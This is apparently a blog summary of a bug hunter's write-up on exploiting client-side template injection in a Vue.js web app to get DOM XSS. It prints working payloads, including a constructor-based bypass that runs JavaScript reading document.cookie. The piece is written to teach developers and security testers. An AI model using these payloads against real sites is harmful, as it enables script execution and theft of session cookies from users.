XSS Via CSTI – DOM XSS – Vue JS Execution Vulnerability – A savvy bug hunter, known as Amr, recently uncovered a significant security flaw in a web application, shedding light on the potential risks posed by Client-Side Template Injection (CSTI). Posted at Medium on February 16, 2024, Amr’s detailed write-up provides valuable insights into his discovery and exploitation of this vulnerability.
Amr’s exploration started with thorough recon, combing through the web app for any possible weaknesses. Once he spotted the Vue.js framework in action, he shifted gears to probe for Server-Side Template Injection (SSTI) vulnerabilities. However, he soon hit a roadblock when he encountered the constraints of Client-Side Template Engines like Vue.js, which process data solely on the client’s side.
Undeterred, Next Amr recognized an opportunity to exploit the CSTI vulnerability to achieve JavaScript Execution (DOM XSS). Armed with his newfound insight, he crafted a payload using Vue.js’s template syntax, {{alert(document.cookie)}}, aiming to trigger an alert and confirm JavaScript execution.
In the event of a failed payload, Amr utilized error messages thrown by Vue.js to gain deeper insights into the code’s structure. Through careful analysis and leveraging the constructor property (using the payload: {{$emit.constructor}} ) . After that, he crafted a custom function, bypassing Vue.js’s security measures and successfully executing JavaScript with code {{$emit.constructor`alert(document.cookie)`()}} , to create a function that pop up an alert box.
His detailed report not only demonstrates his technical skills but also offers valuable lessons for developers and security experts. By pointing out the dangers of CSTI vulnerabilities, Amr’s findings emphasize the critical need for thorough testing and proactive security measures to protect web applications from potential attacks.
This finding underscores the importance of staying alert and working together in the cybersecurity community to spot and tackle new threats effectively. Amr’s work is a clear reminder that cybersecurity challenges are always changing, highlighting the need to stay ahead of the game.
Link to read full write up: here
Save the PDF here